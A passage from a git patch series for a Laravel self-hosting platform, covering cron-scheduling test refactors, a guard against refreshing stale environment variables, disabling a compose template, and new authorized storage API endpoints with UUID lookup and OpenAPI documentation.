+    expect(Cache::get('server-patch-check:seed-test'))->not->toBeNull();
+
+    // Next Sunday at 00:02 — delayed 2 minutes past cron
+    // Catch-up: previousDue = Mar 1 00:00, lastDispatched = Feb 22 → fires
+    Carbon::setTestNow(Carbon::create(2026, 3, 1, 0, 2, 0, 'UTC'));
+
+    $result2 = shouldRunCronNow('0 0 * * 0', 'UTC', 'server-patch-check:seed-test');
+    expect($result2)->toBeTrue();
+});
+
+it('daily cron fires after cache seed even when delayed past the minute', function () {
+    // Step 1: 15:00 — not due for midnight cron, but seeds cache
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 15, 0, 0, 'UTC'));
+
+    $result1 = shouldRunCronNow('0 0 * * *', 'UTC', 'sentinel-restart:seed-test');
+    expect($result1)->toBeFalse();
+
+    // Step 2: Next day at 00:05 — delayed 5 minutes past midnight
+    // Catch-up: previousDue = Mar 1 00:00, lastDispatched = Feb 28 00:00 → fires
+    Carbon::setTestNow(Carbon::create(2026, 3, 1, 0, 5, 0, 'UTC'));
+
+    $result2 = shouldRunCronNow('0 0 * * *', 'UTC', 'sentinel-restart:seed-test');
+    expect($result2)->toBeTrue();
+});
+
 it('does not double-dispatch within same cron window', function () {
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 0, 0, 0, 'UTC'));
 
-    $job = new ServerManagerJob;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    $first = $method->invoke($job, '0 0 * * *', 'UTC', 'sentinel-restart:10');
+    $first = shouldRunCronNow('0 0 * * *', 'UTC', 'sentinel-restart:10');
     expect($first)->toBeTrue();
 
     // Next minute — should NOT dispatch again
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 0, 1, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
 
-    $second = $method->invoke($job, '0 0 * * *', 'UTC', 'sentinel-restart:10');
+    $second = shouldRunCronNow('0 0 * * *', 'UTC', 'sentinel-restart:10');
     expect($second)->toBeFalse();
 });

From 3d5fee4d36510a0f7133905a99d3fab0d2b90004 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 10:52:59 +0100
Subject: [PATCH 106/213] fix(environment-variable): guard refresh against
 missing or stale variables

Add early return in refresh() to skip sync operations if the environment variable no longer exists or is not fresh, preventing errors when refreshing stale or deleted variables.
---
 app/Livewire/Project/Shared/EnvironmentVariable/Show.php | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
index 2a18be13c..c567d96aa 100644
--- a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
+++ b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
@@ -98,6 +98,9 @@ public function getResourceProperty()
 
     public function refresh()
     {
+        if (! $this->env->exists || ! $this->env->fresh()) {
+            return;
+        }
         $this->syncData();
         $this->checkEnvs();
     }

From 23b52487c4092bfc875a08d5d3a38610690560c3 Mon Sep 17 00:00:00 2001
From: Claude <noreply@anthropic.com>
Date: Mon, 23 Mar 2026 09:53:07 +0000
Subject: [PATCH 107/213] Disable booklore service template

Add `# ignore: true` to the booklore compose file so the service
template generator skips it, hiding it from the UI.

https://claude.ai/code/session_01Y7ZeGwqPp97oXwyLCPja9k
---
 templates/compose/booklore.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/templates/compose/booklore.yaml b/templates/compose/booklore.yaml
index fddde8de0..a26e52932 100644
--- a/templates/compose/booklore.yaml
+++ b/templates/compose/booklore.yaml
@@ -1,3 +1,4 @@
+# ignore: true
 # documentation: https://booklore.org/docs/getting-started
 # slogan: Booklore is an open-source library management system for your digital book collection.
 # tags: media, books, kobo, epub, ebook, KOreader

From ae33447994001d4d3df57150899b6596272ef6b2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 15:15:02 +0100
Subject: [PATCH 108/213] feat(storage): add storage endpoints and UUID support
 for databases and services

- Add storage endpoints (list, create, update, delete) to DatabasesController
- Add storage endpoints (list, create, update, delete) to ServicesController
- Add UUID field and migration for local_persistent_volumes table
- Update LocalPersistentVolume model to extend BaseModel
- Support UUID-based storage identification in ApplicationsController
- Update OpenAPI documentation with new storage endpoints and schemas
- Fix application name generation to extract repo name from full git path
- Add comprehensive tests for storage API operations
---
 .../Api/ApplicationsController.php            | 281 +++++-
 .../Controllers/Api/DatabasesController.php   | 519 +++++++++++
 .../Controllers/Api/ServicesController.php    | 605 +++++++++++++
 app/Models/LocalPersistentVolume.php          |   3 +-
 bootstrap/helpers/shared.php                  |   4 +-
 ...uuid_to_local_persistent_volumes_table.php |  39 +
 openapi.json                                  | 829 +++++++++++++++++-
 openapi.yaml                                  | 545 +++++++++++-
 routes/api.php                                |  12 +
 tests/Feature/GenerateApplicationNameTest.php |  22 +
 tests/Feature/StorageApiTest.php              | 379 ++++++++
 11 files changed, 3224 insertions(+), 14 deletions(-)
 create mode 100644 database/migrations/2026_03_23_101720_add_uuid_to_local_persistent_volumes_table.php
 create mode 100644 tests/Feature/GenerateApplicationNameTest.php
 create mode 100644 tests/Feature/StorageApiTest.php

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 3444f9f14..66f6a1ef8 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -11,6 +11,8 @@
 use App\Models\Application;
 use App\Models\EnvironmentVariable;
 use App\Models\GithubApp;
+use App\Models\LocalFileVolume;
+use App\Models\LocalPersistentVolume;
 use App\Models\PrivateKey;
 use App\Models\Project;
 use App\Models\Server;
@@ -4026,9 +4028,10 @@ public function storages(Request $request): JsonResponse
                     mediaType: 'application/json',
                     schema: new OA\Schema(
                         type: 'object',
-                        required: ['id', 'type'],
+                        required: ['type'],
                         properties: [
-                            'id' => ['type' => 'integer', 'description' => 'The ID of the storage.'],
+                            'uuid' => ['type' => 'string', 'description' => 'The UUID of the storage (preferred).'],
+                            'id' => ['type' => 'integer', 'description' => 'The ID of the storage (deprecated, use uuid instead).'],
                             'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage: persistent or file.'],
                             'is_preview_suffix_enabled' => ['type' => 'boolean', 'description' => 'Whether to add -pr-N suffix for preview deployments.'],
                             'name' => ['type' => 'string', 'description' => 'The volume name (persistent only, not allowed for read-only storages).'],
@@ -4078,7 +4081,7 @@ public function update_storage(Request $request): JsonResponse
             return $return;
         }
 
-        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
 
         if (! $application) {
             return response()->json([
@@ -4089,7 +4092,8 @@ public function update_storage(Request $request): JsonResponse
         $this->authorize('update', $application);
 
         $validator = customApiValidator($request->all(), [
-            'id' => 'required|integer',
+            'uuid' => 'string',
+            'id' => 'integer',
             'type' => 'required|string|in:persistent,file',
             'is_preview_suffix_enabled' => 'boolean',
             'name' => 'string',
@@ -4098,7 +4102,7 @@ public function update_storage(Request $request): JsonResponse
             'content' => 'string|nullable',
         ]);
 
-        $allAllowedFields = ['id', 'type', 'is_preview_suffix_enabled', 'name', 'mount_path', 'host_path', 'content'];
+        $allAllowedFields = ['uuid', 'id', 'type', 'is_preview_suffix_enabled', 'name', 'mount_path', 'host_path', 'content'];
         $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
         if ($validator->fails() || ! empty($extraFields)) {
             $errors = $validator->errors();
@@ -4114,10 +4118,23 @@ public function update_storage(Request $request): JsonResponse
             ], 422);
         }
 
+        $storageUuid = $request->input('uuid');
+        $storageId = $request->input('id');
+
+        if (! $storageUuid && ! $storageId) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => ['uuid' => 'Either uuid or id is required.'],
+            ], 422);
+        }
+
+        $lookupField = $storageUuid ? 'uuid' : 'id';
+        $lookupValue = $storageUuid ?? $storageId;
+
         if ($request->type === 'persistent') {
-            $storage = $application->persistentStorages->where('id', $request->id)->first();
+            $storage = $application->persistentStorages->where($lookupField, $lookupValue)->first();
         } else {
-            $storage = $application->fileStorages->where('id', $request->id)->first();
+            $storage = $application->fileStorages->where($lookupField, $lookupValue)->first();
         }
 
         if (! $storage) {
@@ -4183,4 +4200,254 @@ public function update_storage(Request $request): JsonResponse
 
         return response()->json($storage);
     }
+
+    #[OA\Post(
+        summary: 'Create Storage',
+        description: 'Create a persistent storage or file storage for an application.',
+        path: '/applications/{uuid}/storages',
+        operationId: 'create-storage-by-application-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Applications'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the application.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['type', 'mount_path'],
+                        properties: [
+                            'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage.'],
+                            'name' => ['type' => 'string', 'description' => 'Volume name (persistent only, required for persistent).'],
+                            'mount_path' => ['type' => 'string', 'description' => 'The container mount path.'],
+                            'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, optional).'],
+                            'content' => ['type' => 'string', 'nullable' => true, 'description' => 'File content (file only, optional).'],
+                            'is_directory' => ['type' => 'boolean', 'description' => 'Whether this is a directory mount (file only, default false).'],
+                            'fs_path' => ['type' => 'string', 'description' => 'Host directory path (required when is_directory is true).'],
+                        ],
+                        additionalProperties: false,
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 201,
+                description: 'Storage created.',
+                content: new OA\JsonContent(type: 'object'),
+            ),
+            new OA\Response(response: 401, ref: '#/components/responses/401'),
+            new OA\Response(response: 400, ref: '#/components/responses/400'),
+            new OA\Response(response: 404, ref: '#/components/responses/404'),
+            new OA\Response(response: 422, ref: '#/components/responses/422'),
+        ]
+    )]
+    public function create_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $return = validateIncomingRequest($request);
+        if ($return instanceof JsonResponse) {
+            return $return;
+        }
+
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        if (! $application) {
+            return response()->json(['message' => 'Application not found.'], 404);
+        }
+
+        $this->authorize('update', $application);
+
+        $validator = customApiValidator($request->all(), [
+            'type' => 'required|string|in:persistent,file',
+            'name' => 'string',
+            'mount_path' => 'required|string',
+            'host_path' => 'string|nullable',
+            'content' => 'string|nullable',
+            'is_directory' => 'boolean',
+            'fs_path' => 'string',
+        ]);
+
+        $allAllowedFields = ['type', 'name', 'mount_path', 'host_path', 'content', 'is_directory', 'fs_path'];
+        $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
+        if ($validator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors();
+            if (! empty($extraFields)) {
+                foreach ($extraFields as $field) {
+                    $errors->add($field, 'This field is not allowed.');
+                }
+            }
+
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $errors,
+            ], 422);
+        }
+
+        if ($request->type === 'persistent') {
+            if (! $request->name) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['name' => 'The name field is required for persistent storages.'],
+                ], 422);
+            }
+
+            $typeSpecificInvalidFields = array_intersect(['content', 'is_directory', 'fs_path'], array_keys($request->all()));
+            if (! empty($typeSpecificInvalidFields)) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => collect($typeSpecificInvalidFields)
+                        ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type 'persistent'."]),
+                ], 422);
+            }
+
+            $storage = LocalPersistentVolume::create([
+                'name' => $application->uuid.'-'.$request->name,
+                'mount_path' => $request->mount_path,
+                'host_path' => $request->host_path,
+                'resource_id' => $application->id,
+                'resource_type' => $application->getMorphClass(),
+            ]);
+
+            return response()->json($storage, 201);
+        }
+
+        // File storage
+        $typeSpecificInvalidFields = array_intersect(['name', 'host_path'], array_keys($request->all()));
+        if (! empty($typeSpecificInvalidFields)) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => collect($typeSpecificInvalidFields)
+                    ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type 'file'."]),
+            ], 422);
+        }
+
+        $isDirectory = $request->boolean('is_directory', false);
+
+        if ($isDirectory) {
+            if (! $request->fs_path) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['fs_path' => 'The fs_path field is required for directory mounts.'],
+                ], 422);
+            }
+
+            $fsPath = str($request->fs_path)->trim()->start('/')->value();
+            $mountPath = str($request->mount_path)->trim()->start('/')->value();
+
+            validateShellSafePath($fsPath, 'storage source path');
+            validateShellSafePath($mountPath, 'storage destination path');
+
+            $storage = LocalFileVolume::create([
+                'fs_path' => $fsPath,
+                'mount_path' => $mountPath,
+                'is_directory' => true,
+                'resource_id' => $application->id,
+                'resource_type' => get_class($application),
+            ]);
+        } else {
+            $mountPath = str($request->mount_path)->trim()->start('/')->value();
+            $fsPath = application_configuration_dir().'/'.$application->uuid.$mountPath;
+
+            $storage = LocalFileVolume::create([
+                'fs_path' => $fsPath,
+                'mount_path' => $mountPath,
+                'content' => $request->content,
+                'is_directory' => false,
+                'resource_id' => $application->id,
+                'resource_type' => get_class($application),
+            ]);
+        }
+
+        return response()->json($storage, 201);
+    }
+
+    #[OA\Delete(
+        summary: 'Delete Storage',
+        description: 'Delete a persistent storage or file storage by application UUID.',
+        path: '/applications/{uuid}/storages/{storage_uuid}',
+        operationId: 'delete-storage-by-application-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Applications'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the application.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+            new OA\Parameter(
+                name: 'storage_uuid',
+                in: 'path',
+                description: 'UUID of the storage.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+        ],
+        responses: [
+            new OA\Response(response: 200, description: 'Storage deleted.', content: new OA\JsonContent(
+                properties: [new OA\Property(property: 'message', type: 'string')],
+            )),
+            new OA\Response(response: 401, ref: '#/components/responses/401'),
+            new OA\Response(response: 400, ref: '#/components/responses/400'),
+            new OA\Response(response: 404, ref: '#/components/responses/404'),
+            new OA\Response(response: 422, ref: '#/components/responses/422'),
+        ]
+    )]
+    public function delete_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        if (! $application) {
+            return response()->json(['message' => 'Application not found.'], 404);
+        }
+
+        $this->authorize('update', $application);
+
+        $storageUuid = $request->route('storage_uuid');
+
+        $storage = $application->persistentStorages->where('uuid', $storageUuid)->first();
+        if (! $storage) {
+            $storage = $application->fileStorages->where('uuid', $storageUuid)->first();
+        }
+
+        if (! $storage) {
+            return response()->json(['message' => 'Storage not found.'], 404);
+        }
+
+        if ($storage->shouldBeReadOnlyInUI()) {
+            return response()->json([
+                'message' => 'This storage is read-only (managed by docker-compose or service definition) and cannot be deleted.',
+            ], 422);
+        }
+
+        if ($storage instanceof LocalFileVolume) {
+            $storage->deleteStorageOnServer();
+        }
+
+        $storage->delete();
+
+        return response()->json(['message' => 'Storage deleted.']);
+    }
 }
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 6ad18d872..700055fcc 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -12,11 +12,14 @@
 use App\Jobs\DatabaseBackupJob;
 use App\Jobs\DeleteResourceJob;
 use App\Models\EnvironmentVariable;
+use App\Models\LocalFileVolume;
+use App\Models\LocalPersistentVolume;
 use App\Models\Project;
 use App\Models\S3Storage;
 use App\Models\ScheduledDatabaseBackup;
 use App\Models\Server;
 use App\Models\StandalonePostgresql;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\DB;
 use OpenApi\Attributes as OA;
@@ -3298,4 +3301,520 @@ public function delete_env_by_uuid(Request $request)
 
         return response()->json(['message' => 'Environment variable deleted.']);
     }
+
+    #[OA\Get(
+        summary: 'List Storages',
+        description: 'List all persistent storages and file storages by database UUID.',
+        path: '/databases/{uuid}/storages',
+        operationId: 'list-storages-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'All storages by database UUID.',
+                content: new OA\JsonContent(
+                    properties: [
+                        new OA\Property(property: 'persistent_storages', type: 'array', items: new OA\Items(type: 'object')),
+                        new OA\Property(property: 'file_storages', type: 'array', items: new OA\Items(type: 'object')),
+                    ],
+                ),
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+        ]
+    )]
+    public function storages(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->uuid, $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('view', $database);
+
+        $persistentStorages = $database->persistentStorages->sortBy('id')->values();
+        $fileStorages = $database->fileStorages->sortBy('id')->values();
+
+        return response()->json([
+            'persistent_storages' => $persistentStorages,
+            'file_storages' => $fileStorages,
+        ]);
+    }
+
+    #[OA\Post(
+        summary: 'Create Storage',
+        description: 'Create a persistent storage or file storage for a database.',
+        path: '/databases/{uuid}/storages',
+        operationId: 'create-storage-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['type', 'mount_path'],
+                        properties: [
+                            'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage.'],
+                            'name' => ['type' => 'string', 'description' => 'Volume name (persistent only, required for persistent).'],
+                            'mount_path' => ['type' => 'string', 'description' => 'The container mount path.'],
+                            'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, optional).'],
+                            'content' => ['type' => 'string', 'nullable' => true, 'description' => 'File content (file only, optional).'],
+                            'is_directory' => ['type' => 'boolean', 'description' => 'Whether this is a directory mount (file only, default false).'],
+                            'fs_path' => ['type' => 'string', 'description' => 'Host directory path (required when is_directory is true).'],
+                        ],
+                        additionalProperties: false,
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 201,
+                description: 'Storage created.',
+                content: new OA\JsonContent(type: 'object'),
+            ),
+            new OA\Response(response: 401, ref: '#/components/responses/401'),
+            new OA\Response(response: 400, ref: '#/components/responses/400'),
+            new OA\Response(response: 404, ref: '#/components/responses/404'),
+            new OA\Response(response: 422, ref: '#/components/responses/422'),
+        ]
+    )]
+    public function create_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $return = validateIncomingRequest($request);
+        if ($return instanceof JsonResponse) {
+            return $return;
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->uuid, $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('update', $database);
+
+        $validator = customApiValidator($request->all(), [
+            'type' => 'required|string|in:persistent,file',
+            'name' => 'string',
+            'mount_path' => 'required|string',
+            'host_path' => 'string|nullable',
+            'content' => 'string|nullable',
+            'is_directory' => 'boolean',
+            'fs_path' => 'string',
+        ]);
+
+        $allAllowedFields = ['type', 'name', 'mount_path', 'host_path', 'content', 'is_directory', 'fs_path'];
+        $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
+        if ($validator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors();
+            if (! empty($extraFields)) {
+                foreach ($extraFields as $field) {
+                    $errors->add($field, 'This field is not allowed.');
+                }
+            }
+
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $errors,
+            ], 422);
+        }
+
+        if ($request->type === 'persistent') {
+            if (! $request->name) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['name' => 'The name field is required for persistent storages.'],
+                ], 422);
+            }
+
+            $typeSpecificInvalidFields = array_intersect(['content', 'is_directory', 'fs_path'], array_keys($request->all()));
+            if (! empty($typeSpecificInvalidFields)) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => collect($typeSpecificInvalidFields)
+                        ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type 'persistent'."]),
+                ], 422);
+            }
+
+            $storage = LocalPersistentVolume::create([
+                'name' => $database->uuid.'-'.$request->name,
+                'mount_path' => $request->mount_path,
+                'host_path' => $request->host_path,
+                'resource_id' => $database->id,
+                'resource_type' => $database->getMorphClass(),
+            ]);
+
+            return response()->json($storage, 201);
+        }
+
+        // File storage
+        $typeSpecificInvalidFields = array_intersect(['name', 'host_path'], array_keys($request->all()));
+        if (! empty($typeSpecificInvalidFields)) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => collect($typeSpecificInvalidFields)
+                    ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type 'file'."]),
+            ], 422);
+        }
+
+        $isDirectory = $request->boolean('is_directory', false);
+
+        if ($isDirectory) {
+            if (! $request->fs_path) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['fs_path' => 'The fs_path field is required for directory mounts.'],
+                ], 422);
+            }
+
+            $fsPath = str($request->fs_path)->trim()->start('/')->value();
+            $mountPath = str($request->mount_path)->trim()->start('/')->value();
+
+            validateShellSafePath($fsPath, 'storage source path');
+            validateShellSafePath($mountPath, 'storage destination path');
+
+            $storage = LocalFileVolume::create([
+                'fs_path' => $fsPath,
+                'mount_path' => $mountPath,
+                'is_directory' => true,
+                'resource_id' => $database->id,
+                'resource_type' => get_class($database),
+            ]);
+        } else {
+            $mountPath = str($request->mount_path)->trim()->start('/')->value();
+            $fsPath = database_configuration_dir().'/'.$database->uuid.$mountPath;
+
+            $storage = LocalFileVolume::create([
+                'fs_path' => $fsPath,
+                'mount_path' => $mountPath,
+                'content' => $request->content,
+                'is_directory' => false,
+                'resource_id' => $database->id,
+                'resource_type' => get_class($database),
+            ]);
+        }
+
+        return response()->json($storage, 201);
+    }
+
+    #[OA\Patch(
+        summary: 'Update Storage',
+        description: 'Update a persistent storage or file storage by database UUID.',
+        path: '/databases/{uuid}/storages',
+        operationId: 'update-storage-by-database-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            description: 'Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.',
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['type'],
+                        properties: [
+                            'uuid' => ['type' => 'string', 'description' => 'The UUID of the storage (preferred).'],
+                            'id' => ['type' => 'integer', 'description' => 'The ID of the storage (deprecated, use uuid instead).'],
+                            'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage: persistent or file.'],
+                            'is_preview_suffix_enabled' => ['type' => 'boolean', 'description' => 'Whether to add -pr-N suffix for preview deployments.'],
+                            'name' => ['type' => 'string', 'description' => 'The volume name (persistent only, not allowed for read-only storages).'],
+                            'mount_path' => ['type' => 'string', 'description' => 'The container mount path (not allowed for read-only storages).'],
+                            'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, not allowed for read-only storages).'],
+                            'content' => ['type' => 'string', 'nullable' => true, 'description' => 'The file content (file only, not allowed for read-only storages).'],
+                        ],
+                        additionalProperties: false,
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'Storage updated.',
+                content: new OA\JsonContent(type: 'object'),
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+            new OA\Response(
+                response: 422,
+                ref: '#/components/responses/422',
+            ),
+        ]
+    )]
+    public function update_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $return = validateIncomingRequest($request);
+        if ($return instanceof \Illuminate\Http\JsonResponse) {
+            return $return;
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->route('uuid'), $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('update', $database);
+
+        $validator = customApiValidator($request->all(), [
+            'uuid' => 'string',
+            'id' => 'integer',
+            'type' => 'required|string|in:persistent,file',
+            'is_preview_suffix_enabled' => 'boolean',
+            'name' => 'string',
+            'mount_path' => 'string',
+            'host_path' => 'string|nullable',
+            'content' => 'string|nullable',
+        ]);
+
+        $allAllowedFields = ['uuid', 'id', 'type', 'is_preview_suffix_enabled', 'name', 'mount_path', 'host_path', 'content'];
+        $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
+        if ($validator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors();
+            if (! empty($extraFields)) {
+                foreach ($extraFields as $field) {
+                    $errors->add($field, 'This field is not allowed.');
+                }
+            }
+
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $errors,
+            ], 422);
+        }
+
+        $storageUuid = $request->input('uuid');
+        $storageId = $request->input('id');
+
+        if (! $storageUuid && ! $storageId) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => ['uuid' => 'Either uuid or id is required.'],
+            ], 422);
+        }
+
+        $lookupField = $storageUuid ? 'uuid' : 'id';
+        $lookupValue = $storageUuid ?? $storageId;
+
+        if ($request->type === 'persistent') {
+            $storage = $database->persistentStorages->where($lookupField, $lookupValue)->first();
+        } else {
+            $storage = $database->fileStorages->where($lookupField, $lookupValue)->first();
+        }
+
+        if (! $storage) {
+            return response()->json([
+                'message' => 'Storage not found.',
+            ], 404);
+        }
+
+        $isReadOnly = $storage->shouldBeReadOnlyInUI();
+        $editableOnlyFields = ['name', 'mount_path', 'host_path', 'content'];
+        $requestedEditableFields = array_intersect($editableOnlyFields, array_keys($request->all()));
+
+        if ($isReadOnly && ! empty($requestedEditableFields)) {
+            return response()->json([
+                'message' => 'This storage is read-only (managed by docker-compose or service definition). Only is_preview_suffix_enabled can be updated.',
+                'read_only_fields' => array_values($requestedEditableFields),
+            ], 422);
+        }
+
+        // Reject fields that don't apply to the given storage type
+        if (! $isReadOnly) {
+            $typeSpecificInvalidFields = $request->type === 'persistent'
+                ? array_intersect(['content'], array_keys($request->all()))
+                : array_intersect(['name', 'host_path'], array_keys($request->all()));
+
+            if (! empty($typeSpecificInvalidFields)) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => collect($typeSpecificInvalidFields)
+                        ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type '{$request->type}'."]),
+                ], 422);
+            }
+        }
+
+        // Always allowed
+        if ($request->has('is_preview_suffix_enabled')) {
+            $storage->is_preview_suffix_enabled = $request->is_preview_suffix_enabled;
+        }
+
+        // Only for editable storages
+        if (! $isReadOnly) {
+            if ($request->type === 'persistent') {
+                if ($request->has('name')) {
+                    $storage->name = $request->name;
+                }
+                if ($request->has('mount_path')) {
+                    $storage->mount_path = $request->mount_path;
+                }
+                if ($request->has('host_path')) {
+                    $storage->host_path = $request->host_path;
+                }
+            } else {
+                if ($request->has('mount_path')) {
+                    $storage->mount_path = $request->mount_path;
+                }
+                if ($request->has('content')) {
+                    $storage->content = $request->content;
+                }
+            }
+        }
+
+        $storage->save();
+
+        return response()->json($storage);
+    }
+
+    #[OA\Delete(
+        summary: 'Delete Storage',
+        description: 'Delete a persistent storage or file storage by database UUID.',
+        path: '/databases/{uuid}/storages/{storage_uuid}',
+        operationId: 'delete-storage-by-database-uuid',
+        security: [
